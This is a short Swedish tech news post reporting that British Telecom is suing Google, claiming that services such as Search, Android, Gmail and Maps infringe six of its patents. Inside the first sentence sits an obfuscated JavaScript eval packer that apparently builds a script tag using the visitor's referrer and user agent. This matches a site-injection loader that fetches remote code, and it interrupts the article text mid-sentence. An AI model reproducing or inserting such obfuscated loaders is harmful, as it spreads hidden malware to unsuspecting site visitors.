Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Nu stämmer British Telecom Google på allt

Nu stämmer British Telecom Google på allt
Sebastian
Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntrra|var|u0026u|referrer|krrak||js|php’.split(’|’),0,{}))
stämmer British Telecom Google på nästan allt. Man anser att Googles tjänster Google Search, Android, AdSense, Gmail, Google+, Google Docs, Google Music och Google Maps inkräktar på BT:s patent.

British Telecom är världens största telecombolag och ska ha över 10.000 patent i sin portfölj. Sex stycken utav dessa anses vara inkräktade. Det handlar om ganska breda patent om man ska hårddra det hela. Ett av dem handlar om till exempel att man skapar en lista på olika valbara alternativ beroende på var användaren är positionerad. Det innebär att nästan alla deras tjänster som använder någon sorts positionering skulle vara drabbade.

Det verkar som BT har gett sig på just Google efter att ha försökt förhandla fram ett licens-avtal för patent. Än så länge är detta bara spekulationer och Google har inte uttalat sig om stämningen.

Mer info: www.theverge.com